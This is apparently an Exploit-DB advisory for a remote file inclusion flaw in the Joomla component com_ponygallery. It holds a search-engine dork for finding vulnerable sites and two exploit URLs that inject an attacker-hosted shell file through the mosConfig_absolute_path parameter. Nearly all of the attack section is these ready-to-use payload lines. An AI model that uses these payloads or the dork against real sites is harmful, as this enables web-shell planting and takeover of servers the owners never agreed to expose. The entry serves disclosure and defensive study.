Joomla! Component com_ponygallery - Remote File Inclusion
Author: AtT4CKxT3rR0r1ST
type: webapps
platform: php
port:
date_added: 2010-12-23
date_updated: 2016-11-02
verified: 0
codes: OSVDB-72299
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comPONYGALLERY_ML_2_5_1_INSTALL_J_1_5_x.zip
Joomla Component com_ponygallery Multiple Remote File Include
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,2874/chk,9056372cb7b40c9809ba7070ffde09f3/no_html,1/fname,PONYGALLERY_ML_2_5_1_INSTALL.zip.html
.:. Dork : inurl:"com_ponygallery"
####################################################################
===[ Exploit ]===
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]
####################################################################